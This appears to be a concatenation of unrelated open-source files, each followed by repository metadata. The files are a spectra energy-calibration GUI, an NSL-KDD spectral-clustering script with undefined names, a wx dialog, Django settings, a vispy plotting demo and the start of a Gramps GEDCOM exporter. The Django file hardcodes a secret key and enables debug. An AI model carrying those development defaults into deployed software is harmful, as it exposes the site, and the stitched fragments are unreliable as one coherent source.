ScanWindow.ScanWindow( parent=self, backend=None, plugins=False, # Hide plugin tool button roi=False, # No ROI widget control=True, # Hide option button position=True, # Show x,y position display info=True, ) #~ self._plotSpectraWindow.graph.enablemarkermode() calibrationWidget = qt.QGroupBox() calibrationWidget.setTitle('Parameters') calibrationLayout = qt.QHBoxLayout() self._ecalibSpinBox = qt.QDoubleSpinBox() self._ecalibSpinBox.setMaximumWidth(100) self._ecalibSpinBox.setMinimumWidth(70) self._ecalibSpinBox.setAlignment(qt.Qt.AlignRight) self._ecalibSpinBox.setMinimum(-1000000) self._ecalibSpinBox.setMaximum(1000000) self._ecalibSpinBox.setDecimals(2) self._ecalibSpinBox.setSingleStep(1) 
self._ecalibSpinBox.setValue(50) ecalibLayout = qt.QHBoxLayout() ecalibLayout.addWidget(qt.QLabel('meV / px')) ecalibLayout.addWidget(qt.HorizontalSpacer()) ecalibLayout.addWidget(self._ecalibSpinBox) ecalibWidget = qt.QWidget() ecalibWidget.setLayout(ecalibLayout) self._ezeroSpinBox = MarkerSpinBox(self, self._plotSpectraWindow, r'$E=0$') self._ezeroSpinBox.setMaximumWidth(100) self._ezeroSpinBox.setMinimumWidth(70) self._ezeroSpinBox.setAlignment(qt.Qt.AlignRight) self._ezeroSpinBox.setMinimum(-100000) self._ezeroSpinBox.setMaximum(100000) self._ezeroSpinBox.setDecimals(3) self._ezeroSpinBox.setSingleStep(1) self._ezeroSpinBox.setValue(0) ezeroLayout = qt.QHBoxLayout() ezeroLayout.addWidget(qt.QLabel('zero energy pixel')) ezeroLayout.addWidget(qt.HorizontalSpacer()) ezeroLayout.addWidget(self._ezeroSpinBox) ezeroWidget = qt.QWidget() ezeroWidget.setLayout(ezeroLayout) self._markersPositioned = False calibrationLayout.addWidget(ecalibWidget) calibrationLayout.addWidget(ezeroWidget) calibrationWidget.setLayout(calibrationLayout) self.showGaussianCheckBox = qt.QCheckBox('Show Gaussian at zero energy') self.GaussianWidthSpinBox = qt.QDoubleSpinBox() self.GaussianWidthSpinBox.setMaximumWidth(100) self.GaussianWidthSpinBox.setMinimumWidth(70) self.GaussianWidthSpinBox.setAlignment(qt.Qt.AlignRight) self.GaussianWidthSpinBox.setMinimum(0.001) self.GaussianWidthSpinBox.setMaximum(10000000) self.GaussianWidthSpinBox.setDecimals(3) self.GaussianWidthSpinBox.setSingleStep(1) self.GaussianWidthSpinBox.setValue(1) self.GaussianWidthSpinBox.setEnabled(False) GaussianWidthLayout = qt.QHBoxLayout() GaussianWidthLayout.addWidget(qt.QLabel('FWHM')) GaussianWidthLayout.addSpacing(10) GaussianWidthLayout.addWidget(self.GaussianWidthSpinBox) gaussianWidthWidget = qt.QWidget() gaussianWidthWidget.setLayout(GaussianWidthLayout) self.GaussianHeightSpinBox = qt.QDoubleSpinBox() self.GaussianHeightSpinBox.setMaximumWidth(100) self.GaussianHeightSpinBox.setMinimumWidth(70) self.GaussianHeightSpinBox.setAlignment(qt.Qt.AlignRight) self.GaussianHeightSpinBox.setMinimum(0.001) self.GaussianHeightSpinBox.setMaximum(10000000) self.GaussianHeightSpinBox.setDecimals(3) self.GaussianHeightSpinBox.setSingleStep(1) self.GaussianHeightSpinBox.setValue(5) self.GaussianHeightSpinBox.setEnabled(False) GaussianHeightLayout = qt.QHBoxLayout() GaussianHeightLayout.addWidget(qt.QLabel('height')) GaussianHeightLayout.addSpacing(10) GaussianHeightLayout.addWidget(self.GaussianHeightSpinBox) gaussianHeightWidget = qt.QWidget() gaussianHeightWidget.setLayout(GaussianHeightLayout) self.GaussianHeightSpinBox.setDisabled(True) self.autoscaleGaussianCheckBox = qt.QCheckBox('Autoscale height') self.autoscaleGaussianCheckBox.setChecked(True) gaussianLayout = qt.QGridLayout() gaussianLayout.addWidget(self.showGaussianCheckBox, 0, 0, 1, 2) gaussianLayout.addWidget(gaussianWidthWidget, 1, 0, 1, 1) gaussianLayout.addWidget(gaussianHeightWidget, 1, 2, 1, 1) gaussianLayout.addWidget(self.autoscaleGaussianCheckBox, 1, 3, 1, 1) gaussianWidget = qt.QWidget() gaussianWidget.setLayout(gaussianLayout) self.calibrateButton = qt.QPushButton('Convert') self.calibrateButton.setMinimumSize(75,75) self.calibrateButton.setMaximumSize(75,75) self.calibrateButton.clicked.connect(self.calibrateButtonClicked) self.saveButton = qt.QPushButton('Save') self.saveButton.setMinimumSize(75,75) self.saveButton.setMaximumSize(75,75) self.saveButton.clicked.connect(self.saveButtonClicked) self.saveButton.setDisabled(True) self.saveButton.setToolTip('Select output file\nto 
enable saving') self._inputLayout = qt.QHBoxLayout(self) self._inputLayout.addWidget(calibrationWidget) self._inputLayout.addWidget(gaussianWidget) self._inputLayout.addWidget(qt.HorizontalSpacer()) self._inputLayout.addWidget(self.calibrateButton) self._inputLayout.addWidget(self.saveButton) self._inputWidget = qt.QWidget() self._inputWidget.setLayout(self._inputLayout) self._rsLayout = qt.QVBoxLayout(self) self._rsLayout.addWidget(self._inputWidget) self._rsLayout.addWidget(self._plotSpectraWindow) self._rsWidget = qt.QWidget() self._rsWidget.setContentsMargins(0,0,0,-8) self._rsWidget.setLayout(self._rsLayout) self._lsLayout = qt.QVBoxLayout(self) self._lsLayout.addWidget(self._sourceWidget) self._lsLayout.addWidget(self._exportWidget) self._lsWidget = qt.QWidget() self._lsWidget.setContentsMargins(0,0,0,-8) self._lsWidget.setSizePolicy( qt.QSizePolicy(qt.QSizePolicy.Fixed, qt.QSizePolicy.Preferred)) self._lsWidget.setLayout(self._lsLayout) self._lsWidget.setMaximumWidth(500) self.splitter = qt.QSplitter(self) self.splitter.setOrientation(qt.Qt.Horizontal) self.splitter.setHandleWidth(5) self.splitter.setStretchFactor(1, 2) self.splitter.addWidget(self._lsWidget) self.splitter.addWidget(self._rsWidget) self._mainLayout = qt.QHBoxLayout() self._mainLayout.addWidget(self.splitter) self.setLayout(self._mainLayout) return 0 def connect_signals(self): self._sourceWidget.sigAddSelection.connect( self._plotSpectraWindow._addSelection) self._sourceWidget.sigRemoveSelection.connect( self._plotSpectraWindow._removeSelection) self._sourceWidget.sigReplaceSelection.connect( self._plotSpectraWindow._replaceSelection) self.autoscaleGaussianCheckBox.stateChanged.connect( self.autoscaleGaussianChanged) self._sourceWidget.sigAddSelection.connect(self._positionMarkers) self._sourceWidget.sigAddSelection.connect(self._selectionchanged) self._sourceWidget.sigReplaceSelection.connect(self._selectionchanged) self._exportWidget.OutputFileSelected.connect(self._enableSaveButton) self.showGaussianCheckBox.stateChanged.connect(self.gaussianOnOff) self._ezeroSpinBox.intersectionsChangedSignal.connect(self.zeroEnergyChanged) self._ezeroSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True)) self.GaussianWidthSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True)) self.GaussianHeightSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True)) self._sourceWidget.sigReplaceSelection.connect(lambda: self.zeroEnergyChanged(replot=True)) return 0 def zeroEnergyChanged(self, replot=False): if self.showGaussianCheckBox.isChecked(): ezero = self._ezeroSpinBox.value() gwidth = self.GaussianWidthSpinBox.value() gheight = self.GaussianHeightSpinBox.value() if self.autoscaleGaussianCheckBox.isChecked(): curves = [c for c in self._plotSpectraWindow.getAllCurves(just_legend=True) if not c.startswith('Gaussian')] if len(curves): x, y = self._plotSpectraWindow.getCurve(curves[0])[:2] gheight = y[np.abs(x - ezero).argsort()][:5].mean() self.GaussianHeightSpinBox.setValue(gheight) gaussianX = np.linspace(ezero-3*gwidth, ezero+3*gwidth, 100) gaussianY = gheight * np.exp(-(gaussianX-ezero)**2/(2*(gwidth/2.3548)**2)) self._plotSpectraWindow.addCurve( gaussianX, gaussianY, 'Gaussian', ylabel=' ', replot=replot) def gaussianOnOff(self): if self.showGaussianCheckBox.isChecked(): self.GaussianWidthSpinBox.setEnabled(True) if not self.autoscaleGaussianCheckBox.isChecked(): self.GaussianHeightSpinBox.setEnabled(True) self.autoscaleGaussianCheckBox.setEnabled(True) 
self.zeroEnergyChanged(replot=True) else: self.GaussianWidthSpinBox.setEnabled(False) self.GaussianHeightSpinBox.setEnabled(False) self.autoscaleGaussianCheckBox.setEnabled(False) self._plotSpectraWindow.removeCurve('Gaussian ') def autoscaleGaussianChanged(self): if self.autoscaleGaussianCheckBox.isChecked(): self.GaussianHeightSpinBox.setEnabled(False) else: self.GaussianHeightSpinBox.setEnabled(True) def _enableSaveButton(self): self.saveButton.setEnabled(True) self.saveButton.setToolTip(None) def _positionMarkers(self): if not self._markersPositioned: limits = self._plotSpectraWindow.getGraphXLimits() self._ezeroSpinBox.setValue(0.5 * (limits[1]+limits[0])) self._markersPositioned = True def _selectionchanged(self): self.scansCalibrated = False self.calibrateButton.setEnabled(True) def calibrateButtonClicked(self): llist = self._plotSpectraWindow.getAllCurves() # Align scans self.calibratedScans = [] oldlegends = [] sourcenames = [s.sourceName for s in self._sourceWidget.sourceList] for i, scan in enumerate(llist): x, y, legend, scaninfo = scan[:4] if 'SourceName' not in scaninfo or legend.rstrip().endswith('ENE') \ or legend=='Gaussian ': continue sourceindex = sourcenames.index(scaninfo['SourceName']) dataObject = self._sourceWidget.sourceList[sourceindex].getDataObject(scaninfo['Key']) newdataObject = copy.deepcopy(dataObject) xindex = scaninfo['selection']['x'][0] yindex = scaninfo['selection']['y'][0] newx = x - self._ezeroSpinBox.value() newx *= self._ecalibSpinBox.value() * 1e-3 oldlegends.append(legend) newlegend = ''.join([legend, ' ENE']) scaninfo['Ezero'] = self._ezeroSpinBox.value() scaninfo['Ecalib'] = self._ecalibSpinBox.value() scaninfo['oldKey'] = newdataObject.info['Key'] scaninfo['oldX'] = scaninfo['selection']['cntlist'][ scaninfo['selection']['x'][0]] self._plotSpectraWindow.addCurve( newx, y, newlegend, scaninfo, xlabel='Energy', ylabel='', replot=False) self._plotSpectraWindow.setGraphXLabel('Energy') self._plotSpectraWindow.removeCurves(oldlegends) self._plotSpectraWindow.resetZoom() self.scansCalibrated = True self.calibrateButton.setDisabled(True) if not self._exportWidget._folderLineEdit.text() == '': self.saveButton.setEnabled(True) return def saveButtonClicked(self): curves = self._plotSpectraWindow.getAllCurves() dataObjects2save = [] sourcenames = [s.sourceName[0] for s in self._sourceWidget.sourceList] for curve in curves: x, y, legend, info = curve[:4] if not legend.rstrip().endswith('ENE'): continue sourceindex = sourcenames.index(info['FileName']) dataObject = self._sourceWidget.sourceList[sourceindex].getDataObject(info['oldKey']) newdataObject = copy.deepcopy(dataObject) xindex = newdataObject.info['LabelNames'].index(info['oldX']) escale = newdataObject.data[:, xindex] - self._ezeroSpinBox.value() escale *= self._ecalibSpinBox.value() * 1e-3 if newdataObject.info['LabelNames'].count('Energy') > 0: ene_index = newdataObject.info['LabelNames'].index('Energy') newdataObject.data = np.vstack( [newdataObject.data[:,:ene_index].T, escale, newdataObject.data[:, ene_index+1:].T]).T else: newdataObject.data = np.vstack( [newdataObject.data[:,0], escale, newdataObject.data[:, 1:].T]).T newdataObject.info['LabelNames'] = newdataObject.info['LabelNames'][:1] + \ ['Energy'] + newdataObject.info['LabelNames'][1:] newdataObject.info['Command'] = '%s - energy calibrated' % ( info['Command']) header = [] header.append('#D %s\n' % time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))) for hline in newdataObject.info['Header']: if hline.startswith('#D'): continue if
hline.startswith('#N'): continue if hline.startswith('#L'): continue header.append(hline) header.append('#C Parameters for energy calibration') header.append('#C Ezero: %s %s' % (info['Ezero'], info['oldX'])) header.append('#C Ecalib: %s meV / %s' % (info['Ecalib'], info['oldX'])) header.append('#C ') header.append('#N %d' % (len(newdataObject.info['LabelNames']))) header.append('#L %s' % (' '.join(newdataObject.info['LabelNames']))) newdataObject.info['Header'] = header dataObjects2save.append(newdataObject) specfilename = self._exportWidget.outputFile if not os.path.isfile(specfilename): with open('%s' % (specfilename), 'wb+') as f: fileheader = '#F %s\n\n' % (specfilename) f.write(fileheader.encode('ascii')) scannumber = 1 else: keys = SpecFileDataSource(specfilename).getSourceInfo()['KeyList'] scans = [int(k.split('.')[0]) for k in keys] scannumber = max(scans) + 1 for dataObject in dataObjects2save: output = [] command = dataObject.info['Command'] if self._exportWidget.askForScanName(): command = self._exportWidget.getScanName(command) if not command: command = dataObject.info['Command'] output.append('#S %d %s\n' % (scannumber, command)) header = dataObject.info['Header'] for item in header: if item.startswith('#S'): continue output.append(''.join([item, '\n'])) output.append(''.join('%s\n' % (' '.join([str(si) for si in s])) for s in dataObject.data.tolist())) output.append('\n') with open('%s' % (specfilename), 'ab+') as f: f.write(''.join(output).encode('ascii')) print('Spectrum saved to \"%s\"' % (specfilename)) key = SpecFileDataSource(specfilename).getSourceInfo()['KeyList'][-1] if self._exportWidget._datCheckBox.isChecked(): command = command.replace(':','_').replace(' ', '_') if not os.path.isdir(specfilename.rstrip('.spec')): os.mkdir(specfilename.rstrip('.spec')) datfilename = '%s/S%04d_%s_%s.dat' % ( specfilename.rstrip('.spec'), scannumber, key.split('.')[-1], command) np.savetxt('%s' % (datfilename), dataObject.data) print('Spectrum saved to \"%s\"\n' % (datfilename)) #~ scannumber +=1 self.saveButton.setDisabled(True) if __name__ == "__main__": import numpy as np app = qt.QApplication([]) app.lastWindowClosed.connect(app.quit) w = MainWindow() w.show() app.exec_()
mit
-7,016,220,558,226,067,000
40.281188
106
0.598258
false
4.24493
false
false
false
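# ---------------------------------------------------------------------------
# A short sketch of the zero-energy Gaussian built in zeroEnergyChanged
# above: the FWHM from the spin box is turned into a standard deviation via
# sigma = FWHM / (2*sqrt(2*ln 2)) ~= FWHM / 2.3548, which is where the
# 2.3548 constant in the widget code comes from. The numeric values below
# (ezero, fwhm, height) are arbitrary examples, not application values.
import numpy as np

ezero, fwhm, height = 0.0, 1.0, 5.0
sigma = fwhm / (2.0 * np.sqrt(2.0 * np.log(2.0)))    # ~= fwhm / 2.3548
x = np.linspace(ezero - 3 * fwhm, ezero + 3 * fwhm, 100)
y = height * np.exp(-(x - ezero) ** 2 / (2.0 * sigma ** 2))
assert abs(2.0 * np.sqrt(2.0 * np.log(2.0)) - 2.3548) < 1e-3
# ---------------------------------------------------------------------------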
zedoul/AnomalyDetection
test_discretization/test_scikit_sc.py
1
3101
# -*- coding: utf-8 -*-
"""
http://www.astroml.org/sklearn_tutorial/dimensionality_reduction.html
"""
print (__doc__)

import numpy as np
import copy

from sklearn import cluster   # added: cluster.SpectralClustering is used below
from sklearn.cluster import KMeans
from sklearn.cluster import k_means
from sklearn.manifold import spectral_embedding
from sklearn.utils import check_random_state

import nslkdd.preprocessing as preprocessing
import sugarbee.reduction as reduction
import sugarbee.distance as distance
import sugarbee.affinity as affinity
import sugarbee.solver as solver

import scipy.sparse as sparse
import scipy.sparse.csgraph as csgraph

#def assign_undirected_weight(W, i, j, v):
#    W[i,j] = W[j,i] = v

if __name__ == '__main__':
    import time
    start = time.time()

    datasize = 1000
    print "preprocessing data..."
    df, headers = preprocessing.get_preprocessed_data(datasize)
    df_train = copy.deepcopy(df)
    df_train.drop('attack', 1, inplace=True)
    df_train.drop('difficulty', 1, inplace=True)

    print "normal"
    print len(df[df["attack"] == 11])
    print "abnormal"
    print len(df[df["attack"] != 11])

    print "data reduction..."
    proj = reduction.reduction(df_train, n_components=1)

    print "graph generation..."
    A = affinity.get_affinity_matrix(proj, metric_method=distance.gaussian, knn=200)
#    A = affinity.get_affinity_matrix(proj, metric_method=distance.dist, metric_param='euclidean', knn=8)
#    A = affinity.get_affinity_matrix(proj, metric_method=distance.dist, metric_param='manhattan', knn=8)
#    A = affinity.get_affinity_matrix(proj, metric_method=distance.cosdist, knn=8)
    D = affinity.get_degree_matrix(A)
    L = affinity.get_laplacian_matrix(A, D)

    print "data clustering..."
    Abin = None
    if sparse.isspmatrix(L):
        Abin = sparse.csc_matrix(L).sign()
    else:
        Abin = np.sign(L)
    numConn, connMap = csgraph.connected_components(Abin, directed=False)
    numClusters = numConn
    spectral = cluster.SpectralClustering(n_clusters=numClusters,
                                          affinity="precomputed")
    y_spectral = spectral.fit_predict(A)
    res = y_spectral

    print "analyzing result..."
    t = df["attack"].values.tolist()
    f = df["difficulty"].values.tolist()
    print res[:10]
    print t[:10]
    print f[:10]

    # t : 11, normal
    # t : otherwise abnormal
    true_positive = 0
    true_negative = 0
    false_positive = 0
    false_negative = 0
    trueclass = 0
    for i in range(datasize):
        if t[i] == 11 and res[i] == trueclass:
            true_positive = true_positive + 1
        if t[i] != 11 and res[i] == trueclass:
            false_positive = false_positive + 1
        if t[i] != 11 and res[i] != trueclass:
            true_negative = true_negative + 1
        if t[i] == 11 and res[i] != trueclass:
            false_negative = false_negative + 1

    print true_positive
    print true_negative
    print false_positive
    print false_negative

    elapsed = (time.time() - start)
    print "done in %s seconds" % (elapsed)

    tttt = 0
    for zzz in res:   # was "est.labels_"; est is never defined, res holds the labels
        if zzz == trueclass:
            tttt = tttt + 1
    print tttt
mit
1,723,285,607,583,526,000
28.254717
105
0.64979
false
3.411441
false
false
false
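# ---------------------------------------------------------------------------
# A self-contained sketch of the "precomputed affinity" spectral-clustering
# step used in the script above. The two Gaussian blobs and the RBF affinity
# are illustrative stand-ins for the NSL-KDD pipeline, and this is written
# for Python 3 and a current scikit-learn, unlike the Python 2 script above.
import numpy as np
from sklearn.cluster import SpectralClustering
from sklearn.metrics.pairwise import rbf_kernel

rng = np.random.RandomState(0)
X = np.vstack([rng.normal(0.0, 0.3, (50, 2)),     # "normal" cluster
               rng.normal(3.0, 0.3, (50, 2))])    # "abnormal" cluster
A = rbf_kernel(X, gamma=1.0)                      # dense affinity matrix
labels = SpectralClustering(n_clusters=2,
                            affinity='precomputed').fit_predict(A)
print(np.bincount(labels))                        # roughly [50, 50]
# ---------------------------------------------------------------------------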
turdusmerula/kipartman
kipartman/dialogs/dialog_main.py
1
3486
# -*- coding: utf-8 -*-

###########################################################################
## Python code generated with wxFormBuilder (version Dec 18 2018)
## http://www.wxformbuilder.org/
##
## PLEASE DO *NOT* EDIT THIS FILE!
###########################################################################

import wx
import wx.xrc

###########################################################################
## Class DialogMain
###########################################################################

class DialogMain ( wx.Frame ):

    def __init__( self, parent ):
        wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Kipartman", pos = wx.DefaultPosition, size = wx.Size( 1160,686 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )

        self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )

        self.menu_bar = wx.MenuBar( 0 )
        self.menu_file = wx.Menu()
        self.menu_file_project = wx.MenuItem( self.menu_file, wx.ID_ANY, u"Open project", wx.EmptyString, wx.ITEM_NORMAL )
        self.menu_file.Append( self.menu_file_project )

        self.menu_file.AppendSeparator()

        self.menu_buy_parts = wx.MenuItem( self.menu_file, wx.ID_ANY, u"Buy parts", u"Open the buy parts window", wx.ITEM_NORMAL )
        self.menu_file.Append( self.menu_buy_parts )

        self.menu_bar.Append( self.menu_file, u"File" )

        self.menu_view = wx.Menu()
        self.menu_view_configuration = wx.MenuItem( self.menu_view, wx.ID_ANY, u"Configuration", wx.EmptyString, wx.ITEM_NORMAL )
        self.menu_view.Append( self.menu_view_configuration )

        self.menu_bar.Append( self.menu_view, u"View" )

        self.menu_help = wx.Menu()
        self.menu_about = wx.MenuItem( self.menu_help, wx.ID_ANY, u"About", wx.EmptyString, wx.ITEM_NORMAL )
        self.menu_help.Append( self.menu_about )

        self.menu_bar.Append( self.menu_help, u"Help" )

        self.SetMenuBar( self.menu_bar )

        bSizer5 = wx.BoxSizer( wx.VERTICAL )

        self.info = wx.InfoBar( self )
        self.info.SetShowHideEffects( wx.SHOW_EFFECT_NONE, wx.SHOW_EFFECT_NONE )
        self.info.SetEffectDuration( 500 )
        bSizer5.Add( self.info, 0, wx.ALL|wx.EXPAND, 5 )

        self.notebook = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )
        bSizer5.Add( self.notebook, 1, wx.EXPAND |wx.ALL, 5 )

        self.SetSizer( bSizer5 )
        self.Layout()
        self.status = self.CreateStatusBar( 1, wx.STB_SIZEGRIP, wx.ID_ANY )

        self.Centre( wx.BOTH )

        # Connect Events
        self.Bind( wx.EVT_KILL_FOCUS, self.onKillFocus )
        self.Bind( wx.EVT_MENU, self.onMenuFileProjetSelection, id = self.menu_file_project.GetId() )
        self.Bind( wx.EVT_MENU, self.onMenuBuyPartsSelection, id = self.menu_buy_parts.GetId() )
        self.Bind( wx.EVT_MENU, self.onMenuViewConfigurationSelection, id = self.menu_view_configuration.GetId() )
        self.Bind( wx.EVT_MENU, self.onMenuHelpAboutSelection, id = self.menu_about.GetId() )
        self.notebook.Bind( wx.EVT_NOTEBOOK_PAGE_CHANGED, self.onNotebookPageChanged )
        self.notebook.Bind( wx.EVT_NOTEBOOK_PAGE_CHANGING, self.onNotebookPageChanging )

    def __del__( self ):
        pass

    # Virtual event handlers, override them in your derived class
    def onKillFocus( self, event ):
        event.Skip()

    def onMenuFileProjetSelection( self, event ):
        event.Skip()

    def onMenuBuyPartsSelection( self, event ):
        event.Skip()

    def onMenuViewConfigurationSelection( self, event ):
        event.Skip()

    def onMenuHelpAboutSelection( self, event ):
        event.Skip()

    def onNotebookPageChanged( self, event ):
        event.Skip()

    def onNotebookPageChanging( self, event ):
        event.Skip()
gpl-3.0
-5,311,697,587,579,618,000
32.84466
177
0.647734
false
3.068662
true
false
false
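# ---------------------------------------------------------------------------
# The generated class above is meant to be subclassed rather than edited
# (hence the "PLEASE DO *NOT* EDIT THIS FILE!" banner). A minimal sketch of
# the usual wxFormBuilder pattern, overriding one of the virtual event
# handlers; MainFrame and the About text are illustrative, and the import
# path assumes running from the kipartman source tree.
import wx
from dialogs.dialog_main import DialogMain

class MainFrame(DialogMain):
    def onMenuHelpAboutSelection(self, event):
        # replace the generated event.Skip() stub with real behaviour
        wx.MessageBox(u"Kipartman", u"About")

if __name__ == '__main__':
    app = wx.App()
    MainFrame(None).Show()
    app.MainLoop()
# ---------------------------------------------------------------------------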
ayazmaroof/Yscrape
yelpsite/yelpsite/settings.py
1
2059
""" Django settings for yelpsite project. For more information on this file, see https://docs.djangoproject.com/en/1.7/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.7/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'g#o84!cbq0&27c+qw9xl6nakxui40v$ml)ex!-1jvr)!%m+6s7' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'yelpsite.urls' WSGI_APPLICATION = 'yelpsite.wsgi.application' # Database # https://docs.djangoproject.com/en/1.7/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Internationalization # https://docs.djangoproject.com/en/1.7/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Asia/Singapore' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.7/howto/static-files/ STATIC_URL = '/static/'
mit
7,521,403,698,506,085,000
23.807229
71
0.728023
false
3.237421
false
false
false
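# ---------------------------------------------------------------------------
# The generated settings above hard-code SECRET_KEY and leave DEBUG = True,
# which the file's own SECURITY WARNING comments advise against for
# production. A common hardening sketch; the environment-variable names are
# conventional choices, not part of the repo.
import os

SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', 'dev-only-insecure-key')
DEBUG = os.environ.get('DJANGO_DEBUG') == '1'
ALLOWED_HOSTS = [h for h in os.environ.get('DJANGO_ALLOWED_HOSTS', '').split(',') if h]
# ---------------------------------------------------------------------------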
Eric89GXL/vispy
examples/basics/scene/linear_region.py
2
2298
# -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""
Demonstration of the LinearRegion visual.
"""
import sys
import numpy as np

from vispy import app, scene

# vertex positions of data to draw
N = 200
pos = np.zeros((N, 2), dtype=np.float32)
x_lim = [50., 750.]
y_lim = [-2., 2.]
pos[:, 0] = np.linspace(x_lim[0], x_lim[1], N)
pos[:, 1] = np.random.normal(size=N)

# color array
color = np.ones((N, 4), dtype=np.float32)
color[:, 0] = np.linspace(0, 1, N)
color[:, 1] = color[::-1, 0]

canvas = scene.SceneCanvas(keys='interactive', show=True)
grid = canvas.central_widget.add_grid(spacing=0)

viewbox = grid.add_view(row=0, col=1, camera='panzoom')

# add some axes
x_axis = scene.AxisWidget(orientation='bottom')
x_axis.stretch = (1, 0.1)
grid.add_widget(x_axis, row=1, col=1)
x_axis.link_view(viewbox)
y_axis = scene.AxisWidget(orientation='left')
y_axis.stretch = (0.1, 1)
grid.add_widget(y_axis, row=0, col=0)
y_axis.link_view(viewbox)

# add a line plot inside the viewbox
line = scene.Line(pos, color, parent=viewbox.scene)

# add vertical regions
color = np.array([[1.0, 0.0, 0.0, 1.0],
                  [0.0, 1.0, 0.0, 1.0],
                  [0.0, 0.0, 1.0, 1.0],
                  [0.0, 1.0, 0.0, 1.0],
                  [1.0, 0.0, 0.0, 1.0],
                  [0.0, 1.0, 0.0, 1.0]])
pos = np.array([100, 120, 140, 160, 180, 200], dtype=np.float32)
vert_region1 = scene.LinearRegion(pos, color, parent=viewbox.scene)
vert_region2 = scene.LinearRegion([549.2, 700], [0.0, 1.0, 0.0, 0.5],
                                  vertical=True,
                                  parent=viewbox.scene)

# add horizontal regions
pos = np.array([0.3, 0.0, -0.1], dtype=np.float32)
hor_region1 = scene.LinearRegion(pos, [1.0, 0.0, 0.0, 0.5],
                                 vertical=False,
                                 parent=viewbox.scene)
hor_region2 = scene.LinearRegion([-5.1, -2.0], [0.0, 0.0, 1.0, 0.5],
                                 vertical=False,
                                 parent=viewbox.scene)

# auto-scale to see the whole line.
viewbox.camera.set_range()

if __name__ == '__main__' and sys.flags.interactive == 0:
    app.run()
bsd-3-clause
8,837,949,601,075,203,000
29.64
73
0.563098
false
2.802439
false
false
false
jralls/gramps
gramps/plugins/export/exportgedcom.py
1
59838
# # Gramps - a GTK+/GNOME based genealogy program # # Copyright (C) 2000-2007 Donald N. Allingham # Copyright (C) 2008 Brian G. Matherly # Copyright (C) 2008-2009 Gary Burton # Copyright (C) 2008 Robert Cheramy <robert@cheramy.net> # Copyright (C) 2010 Jakim Friant # Copyright (C) 2010 Nick Hall # Copyright (C) 2011 Tim G L Lyons # Copyright (C) 2012 Doug Blank <doug.blank@gmail.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # "Export to GEDCOM" #------------------------------------------------------------------------- # # Standard Python Modules # #------------------------------------------------------------------------- import os import time #------------------------------------------------------------------------- # # Gramps modules # #------------------------------------------------------------------------- from gramps.gen.const import GRAMPS_LOCALE as glocale _ = glocale.translation.gettext from gramps.gen.lib import (AttributeType, ChildRefType, Citation, Date, EventRoleType, EventType, LdsOrd, NameType, PlaceType, NoteType, Person, UrlType) from gramps.version import VERSION import gramps.plugins.lib.libgedcom as libgedcom from gramps.gen.errors import DatabaseError from gramps.gen.updatecallback import UpdateCallback from gramps.gen.utils.file import media_path_full from gramps.gen.utils.place import conv_lat_lon from gramps.gen.utils.location import get_main_location from gramps.gen.display.place import displayer as _pd #------------------------------------------------------------------------- # # GEDCOM tags representing attributes that may take a parameter, value or # description on the same line as the tag # #------------------------------------------------------------------------- NEEDS_PARAMETER = set( ["CAST", "DSCR", "EDUC", "IDNO", "NATI", "NCHI", "NMR", "OCCU", "PROP", "RELI", "SSN", "TITL"]) LDS_ORD_NAME = { LdsOrd.BAPTISM : 'BAPL', LdsOrd.ENDOWMENT : 'ENDL', LdsOrd.SEAL_TO_PARENTS : 'SLGC', LdsOrd.SEAL_TO_SPOUSE : 'SLGS', LdsOrd.CONFIRMATION : 'CONL', } LDS_STATUS = { LdsOrd.STATUS_BIC : "BIC", LdsOrd.STATUS_CANCELED : "CANCELED", LdsOrd.STATUS_CHILD : "CHILD", LdsOrd.STATUS_CLEARED : "CLEARED", LdsOrd.STATUS_COMPLETED : "COMPLETED", LdsOrd.STATUS_DNS : "DNS", LdsOrd.STATUS_INFANT : "INFANT", LdsOrd.STATUS_PRE_1970 : "PRE-1970", LdsOrd.STATUS_QUALIFIED : "QUALIFIED", LdsOrd.STATUS_DNS_CAN : "DNS/CAN", LdsOrd.STATUS_STILLBORN : "STILLBORN", 